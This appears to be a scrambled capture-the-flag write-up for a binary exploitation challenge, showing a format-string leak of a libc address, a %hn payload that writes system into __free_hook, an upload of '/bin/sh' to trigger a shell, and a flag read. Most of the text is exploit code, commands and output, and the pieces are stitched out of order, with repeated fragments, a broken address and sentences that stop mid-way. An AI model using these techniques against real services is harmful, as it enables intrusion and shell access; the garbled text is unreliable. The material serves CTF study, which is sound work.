> echo AAAA%low%8$hn%high%9$hnBBBBaddr_lowaddr_high Where addr_low and addr_high are the low/high 2‑byte parts of __free_hook placed in the payload after the format string (so that they appear on the stack as the 8th and 9th arguments).
if __name__ == '__main__': main()
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=a1b2c3d4e5f6..., stripped PIE: No, RELRO: Partial, Stack: Canary found, NX: Enabled, PIE: No, RPATH: [] 3.1 Interaction > help Commands: echo <msg> - Echoes back the message calc <expr> - Evaluates a simple arithmetic expression upload <filename> - Upload a file to the server download <filename> - Download a file from the server exit - Quit The only interesting command is echo . Sending a long string revealed an unintended format‑string :
| Function | Purpose | |----------|---------| | leak_libc | Uses the format‑string to leak a libc address and compute the base. | | write_free_hook | Crafts a two‑write %hn payload that stores system at __free_hook . | | get_shell | Uploads a chunk containing /bin/sh and then frees it, invoking system . | | main | Orchestrates the steps and drops SONE-127 2021
> upload sh.txt [uploading 8 bytes] /bin/sh The service stores the content in a heap chunk. When we later request download sh.txt , the binary will free the buffer after sending the content. Because __free_hook now points to system , free(buf) becomes system(buf) . Since buf points to the string "/bin/sh" , we get a shell.
from pwn import *
io.sendlineafter(b'> ', b'echo ' + payload) io.recvuntil(b'> ') # sync back to prompt | | write_free_hook | Crafts a two‑write %hn
The final crafted string (Python example):
payload = b'A'*8 # padding for alignment payload += f"%lowc%8$hn".encode() payload += f"%high-lowc%9$hn".encode() payload += b'B'*8 payload += p64(target) # argument 8 payload += p64(target+2) # argument 9 Send the payload with echo and the service writes the low and high halves of system into __free_hook . Now we need a chunk that contains the string "/bin/sh" . The simplest way is to upload a file named sh.txt with that exact content.
HOST = 'sone-127.ctf.example.com' PORT = 31337 When we later request download sh
| Symbol | Offset (hex) | Address (example) | |-----------------|--------------|-------------------| | system | 0x4f550 | 0x7f5c190f550 | | __free_hook | 0x3ed8e8 | 0x7f5c193ed8e8 | | /bin/sh string| 0x1b75aa | 0x7f5c191b75aa | Use pwntools : libc = ELF('libc-2.31.so') system_addr = libc.symbols['system'] + libc_base free_hook = libc.symbols['__free_hook'] + libc_base binsh = next(libc.search(b'/bin/sh')) + libc_base 5.3 Write system into __free_hook The binary uses malloc / free internally for the upload / download commands. By uploading a large payload we can control a heap chunk and then use the format‑string write to place the system address at __free_hook .
> download sh.txt /bin/sh $ id uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) $ cat /flag.txt FLAGSONE_127_2021_4c7f5b Success! #!/usr/bin/env python3 # -*- coding: utf-8 -*-
> echo %7$p 0x7f5c1a2b2e30 The address 0x7f5c1a2b2e30 belongs to the (high address > 0x7f000000).